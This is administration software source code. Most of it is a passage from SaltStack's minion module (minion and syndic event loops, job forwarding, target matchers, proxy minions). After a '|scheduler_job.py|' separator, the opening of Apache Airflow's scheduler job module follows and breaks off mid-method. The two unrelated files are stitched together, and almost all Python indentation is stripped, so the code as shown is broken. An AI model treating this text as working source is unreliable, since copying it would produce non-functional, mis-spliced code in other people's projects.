Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
# Properly exit if a SIGTERM is signalled
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Minion {0!r} trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
salt.utils.event.AsyncEventPublisher(self.opts, self.handle_event, io_loop=self.io_loop)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
salt.utils.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
loop_interval = self.opts['loop_interval']
try:
if self.opts['grains_refresh_every']: # If set and non-zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
self.periodic_callbacks = {}
# schedule the stuff that runs every interval
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0:
def ping_master():
self._fire_master('ping', 'minion_ping')
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000, io_loop=self.io_loop)
self.periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(self._fallback_cleanups, loop_interval * 1000, io_loop=self.io_loop)
def handle_beacons():
# Process Beacons
try:
beacons = self.process_beacons(self.functions)
except Exception:
log.critical('The beacon errored: ', exc_info=True)
if beacons:
self._fire_master(events=beacons)
self.periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(handle_beacons, loop_interval * 1000, io_loop=self.io_loop)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
self.periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000, io_loop=self.io_loop)
# start all the other callbacks
for periodic_cb in six.itervalues(self.periodic_callbacks):
periodic_cb.start()
# add handler to subscriber
self.pub_channel.on_recv(self._handle_payload)
if start:
self.io_loop.start()
def _handle_payload(self, payload):
if payload is not None and self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in load:
match_func = getattr(self.matcher,
'{0}_match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matcher.glob_match(load['tgt']):
return False
return True
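# Illustrative sketch (hypothetical values): a publication that passes the
# checks above must carry tgt/jid/fun/arg, e.g.
#     {'tgt': 'web*', 'tgt_type': 'glob', 'jid': '20230101010101123456',
#      'fun': 'test.ping', 'arg': []}
# grain/grain_pcre/pillar targets additionally honor an optional 'delimiter'.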
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
# force auth_safemode True because the Syndic doesn't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
try:
# Send out the publication
self.local.pub(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
**kwargs)
except Exception as exc:
log.warning('Unable to forward pub data: {0}'.format(exc))
def _fire_master_syndic_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start'
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
)
# Syndic Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Syndic {0!r} trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
self.local.opts['interface'] = self._syndic_interface
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
# register the event sub to the poller
self._reset_event_aggregation()
self.local_event_stream = zmq.eventloop.zmqstream.ZMQStream(self.local.event.sub, io_loop=self.io_loop)
self.local_event_stream.on_recv(self._process_event)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Send an event to the master that the minion is live
self._fire_master_syndic_start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
if start:
self.io_loop.start()
# TODO: clean up docs
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None:
log.trace('Handling payload')
self._handle_decoded_payload(payload['load'])
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
raw = raw[0]
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
event = {'data': data, 'tag': mtag}
log.trace('Got event {0}'.format(event['tag']))
tag_parts = event['tag'].split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
return
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if event['data']['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
self.jid_forward_cache.add(event['data']['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if 'master_id' in event['data']:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events')
if self.raw_events:
self._fire_master(events=self.raw_events,
pretag=tagify(self.opts['id'], base='syndic'),
)
for jid in self.jids:
self._return_pub(self.jids[jid], '_syndic_return')
self._reset_event_aggregation()
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local client's poller, so give it back before
# it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: consolidate syndic classes together?
# need a way of knowing if the syndic connection is busted
class MultiSyndic(MinionBase):
'''
Make a MultiSyndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Modes (controlled by `syndic_mode`):
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, that the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and
non-blocking calls (with varying timeouts along the way), this daemon does
not handle failure well; it will (under most circumstances) stall for ~15s
while trying to forward events to the down master
'''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(MultiSyndic, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
else:
self.io_loop = io_loop
self.io_loop.install()
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = {} # mapping of opts['master'] -> syndic
for master in set(self.opts['master']):
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
log.debug('Syndic attempting to connect to {0}'.format(opts['master']))
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master()
# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
log.info('Syndic successfully connected to {0}'.format(opts['master']))
break
except SaltClientError as exc:
log.error('Error while bringing up syndic for multi-syndic. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < opts['acceptance_wait_time_max']:
auth_wait += opts['acceptance_wait_time']
yield tornado.gen.sleep(auth_wait) # TODO: log?
except KeyboardInterrupt:
raise
except: # pylint: disable=W0702
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
# if its connected, mark it dead
if self._syndics[master].done():
syndic = self._syndics[master].result()
syndic.destroy()
self._syndics[master] = self._connect_syndic(syndic.opts)
else:
log.info('Attempting to mark {0} as dead, although it is already marked dead'.format(master)) # TODO: debug?
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master_id))
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
return
except SaltClientError:
log.error('Unable to call {0} on {1}, trying another...'.format(func, master_id))
self._mark_master_dead(master)
continue
log.critical('Unable to call {0} on any masters!'.format(func))
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self._syndics.keys())
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self._syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
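# Illustrative sketch (hypothetical masters): with syndics for 'm1', 'm2' and
# 'm3' and master_id='m2', the preferred master is yielded first and the rest
# follow in shuffled order, e.g. ('m2', ...), ('m3', ...), ('m1', ...).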
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
log.debug('MultiSyndic {0!r} trying to tune in'.format(self.opts['id']))
# register the event sub to the poller
self._reset_event_aggregation()
self.local_event_stream = zmq.eventloop.zmqstream.ZMQStream(self.local.event.sub, io_loop=self.io_loop)
self.local_event_stream.on_recv(self._process_event)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
raw = raw[0]
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
event = {'data': data, 'tag': mtag}
log.trace('Got event {0}'.format(event['tag']))
tag_parts = event['tag'].split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
return
if self.syndic_mode == 'cluster' and event['data'].get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return received with matching master_id, not forwarding')
return
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if event['data']['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
self.jid_forward_cache.add(event['data']['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if 'master_id' in event['data']:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
# if we are the top-level master, don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events')
if self.raw_events:
self._call_syndic('_fire_master',
kwargs={'events': self.raw_events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self.SYNDIC_EVENT_TIMEOUT,
},
)
for jid, jid_ret in self.jids.items():
self._call_syndic('_return_pub',
args=(jid_ret, '_syndic_return'),
kwargs={'timeout': self.SYNDIC_EVENT_TIMEOUT},
master_id=jid_ret.get('__master_id__'),
)
self._reset_event_aggregation()
class Matcher(object):
'''
Used to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: {0}'.format(
matcher
))
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if not isinstance(tgt, six.string_types):
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, six.string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the grains glob match
'''
log.debug('grains target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter
)
def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt,
delimiter=delimiter, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
if self.functions is None:
utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=utils)
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter
)
def pillar_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar pcre match
'''
log.debug('pillar PCRE target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar PCRE match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter, regex_match=True
)
def pillar_exact_match(self, tgt, delimiter=':'):
'''
Reads in the pillar match, no globbing, no PCRE
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['pillar'],
tgt,
delimiter=delimiter,
exact_match=True)
def ipcidr_match(self, tgt):
'''
Matches based on ip address or CIDR notation
'''
num_parts = len(tgt.split('/'))
if num_parts > 2:
# Target is not valid CIDR
return False
elif num_parts == 2:
# Target is CIDR
return salt.utils.network.in_subnet(
tgt,
addrs=self.opts['grains'].get('ipv4', [])
)
else:
# Target is an IPv4 address
import socket
try:
socket.inet_aton(tgt)
except socket.error:
# Not a valid IPv4 address
return False
else:
return tgt in self.opts['grains'].get('ipv4', [])
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: {0}'.format(exc))
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
if not isinstance(tgt, six.string_types):
log.debug('Compound target received that is not a string')
return False
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'J': 'pillar_pcre',
'L': 'list',
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
tokens = tgt.split()
for match in tokens:
# Try to match tokens from the compound target, first by using
# the 'G, P, I, J, L, S, E' matcher types, then by hostname glob.
if '@' in match and match[1] == '@':
comps = match.split('@')
matcher = ref.get(comps[0])
if not matcher:
# If an unknown matcher is called at any time, fail out
return False
results.append(
str(
getattr(self, '{0}_match'.format(matcher))(
'@'.join(comps[1:])
)
)
)
elif match in opers:
# We didn't match a target, so append a boolean operator or
# subexpression
if results or match in ['(', ')']:
if match == 'not':
match_suffix = results[-1]
if not (match_suffix == 'and' or match_suffix == 'or'):
results.append('and')
results.append(match)
else:
# sequence starts with an operator, fail
if match not in ['(', ')']:
return False
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(str(self.glob_match(match)))
results = ' '.join(results)
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
return False
return False
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
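# A minimal sketch (not the Salt API) of how compound_match above classifies a target such
# as 'G@os:Ubuntu and not L@web1,web2' into matcher tokens and boolean operators before the
# per-matcher results are joined and evaluated; the prefix table mirrors 'ref' above.
def _example_compound_tokens(tgt):
    ref = {'G': 'grain', 'P': 'grain_pcre', 'I': 'pillar', 'J': 'pillar_pcre',
           'L': 'list', 'S': 'ipcidr', 'E': 'pcre'}
    opers = ['and', 'or', 'not', '(', ')']
    tokens = []
    for tok in tgt.split():
        if tok in opers:
            tokens.append(('oper', tok))
        elif len(tok) > 1 and tok[1] == '@':
            # 'G@os:Ubuntu' -> matcher 'grain', expression 'os:Ubuntu'
            prefix, _, expr = tok.partition('@')
            tokens.append((ref.get(prefix, 'unknown'), expr))
        else:
            # No explicit matcher prefix: treated as a hostname glob.
            tokens.append(('glob', tok))
    return tokens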
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
def __init__(self, opts, timeout=60, safe=True): # pylint: disable=W0231
'''
Pass in the options dict
'''
self._running = None
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')]
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup of the opts grains, so we can log from the grains
# module
# print opts['proxymodule']
fq_proxyname = 'proxy.'+opts['proxy']['proxytype']
self.proxymodule = salt.loader.proxy(opts, fq_proxyname)
opts['proxyobject'] = self.proxymodule[opts['proxy']['proxytype']+'.Proxyconn'](opts['proxy'])
opts['id'] = opts['proxyobject'].id(opts)
opts.update(resolve_dns(opts))
self.opts = opts
self.opts['pillar'] = salt.pillar.get_pillar(
opts,
opts['grains'],
opts['id'],
opts['environment']
).compile_pillar()
self.functions, self.returners, self.function_errors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
uid = salt.utils.get_uid(user=opts.get('user', None))
self.proc_dir = get_proc_dir(opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
self.grains_cache = self.opts['grains']
# self._running = True
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
return super(ProxyMinion, self)._prep_mod_opts()
def _load_modules(self, force_refresh=False, notify=False):
'''
Return the functions and the returners loaded up from the loader
module
'''
return super(ProxyMinion, self)._load_modules(force_refresh=force_refresh, notify=notify)
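# A small illustration (assumption only, not Salt code) of how ProxyMinion.__init__ above
# composes loader keys from the 'proxy' section of opts: the module is looked up as
# 'proxy.<proxytype>' and the connection class as '<proxytype>.Proxyconn'.
def _example_proxy_loader_keys(opts):
    proxytype = opts['proxy']['proxytype']
    return 'proxy.' + proxytype, proxytype + '.Proxyconn'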
|
scheduler_job.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from contextlib import redirect_stderr, redirect_stdout
from datetime import timedelta
from time import sleep
from typing import List, Set
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.orm.session import make_transient
from airflow import models, settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException
from airflow.executors.local_executor import LocalExecutor
from airflow.executors.sequential_executor import SequentialExecutor
from airflow.jobs.base_job import BaseJob
from airflow.models import DAG, DagRun, SlaMiss, errors
from airflow.models.taskinstance import SimpleTaskInstance
from airflow.stats import Stats
from airflow.ti_deps.dep_context import SCHEDULEABLE_STATES, SCHEDULED_DEPS, DepContext
from airflow.ti_deps.deps.pool_slots_available_dep import STATES_TO_COUNT_AS_RUNNING
from airflow.utils import asciiart, helpers, timezone
from airflow.utils.dag_processing import (
AbstractDagFileProcessorProcess, DagFileProcessorAgent, SimpleDag, SimpleDagBag,
)
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.file import list_py_file_paths
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.session import provide_session
from airflow.utils.state import State
class DagFileProcessorProcess(AbstractDagFileProcessorProcess, LoggingMixin):
"""Runs DAG processing in a separate process using DagFileProcessor
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: str
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_id_white_list: If specified, only look at these DAG ID's
:type dag_id_white_list: List[str]
:param zombies: zombie task instances to kill
:type zombies: List[airflow.models.taskinstance.SimpleTaskInstance]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(self, file_path, pickle_dags, dag_id_white_list, zombies):
self._file_path = file_path
# The process that was launched to process the given file.
self._process = None
self._dag_id_white_list = dag_id_white_list
self._pickle_dags = pickle_dags
self._zombies = zombies
# The result of DagFileProcessor.process_file(file_path).
self._result = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time = None
# This ID is used to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessorProcess.class_creation_counter
DagFileProcessorProcess.class_creation_counter += 1
@property
def file_path(self):
return self._file_path
@staticmethod
def _run_file_processor(result_channel,
file_path,
pickle_dags,
dag_id_white_list,
thread_name,
zombies):
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: str
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_id_white_list: if specified, only examine DAG ID's that are
in this list
:type dag_id_white_list: list[str]
:param thread_name: the name to use for the process that is launched
:type thread_name: str
:param zombies: zombie task instances to kill
:type zombies: list[airflow.models.taskinstance.SimpleTaskInstance]
:return: the process that was launched
:rtype: multiprocessing.Process
"""
# This helper runs in the newly created process
log = logging.getLogger("airflow.processor")
set_context(log, file_path)
setproctitle("airflow scheduler - DagFileProcessor {}".format(file_path))
try:
# redirect stdout/stderr to log
with redirect_stdout(StreamLogWriter(log, logging.INFO)),\
redirect_stderr(StreamLogWriter(log, logging.WARN)):
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
start_time = time.time()
log.info("Started process (PID=%s) to work on %s", os.getpid(), file_path)
dag_file_processor = DagFileProcessor(dag_ids=dag_id_white_list, log=log)
result = dag_file_processor.process_file(
file_path=file_path,
zombies=zombies,
pickle_dags=pickle_dags
)
result_channel.send(result)
end_time = time.time()
log.info(
"Processing %s took %.3f seconds", file_path, end_time - start_time
)
except Exception:
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
result_channel.close()
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
def start(self):
"""
Launch the process and start processing the DAG.
"""
self._parent_channel, _child_channel = multiprocessing.Pipe()
self._process = multiprocessing.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
self.file_path,
self._pickle_dags,
self._dag_id_white_list,
"DagFileProcessor{}".format(self._instance_id),
self._zombies
),
name="DagFileProcessor{}-Process".format(self._instance_id)
)
self._start_time = timezone.utcnow()
self._process.start()
def kill(self):
"""
Kill the process launched to process the file, and ensure consistent state.
"""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
# The queue will likely get corrupted, so remove the reference
self._result_queue = None
self._kill_process()
def terminate(self, sigkill=False):
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
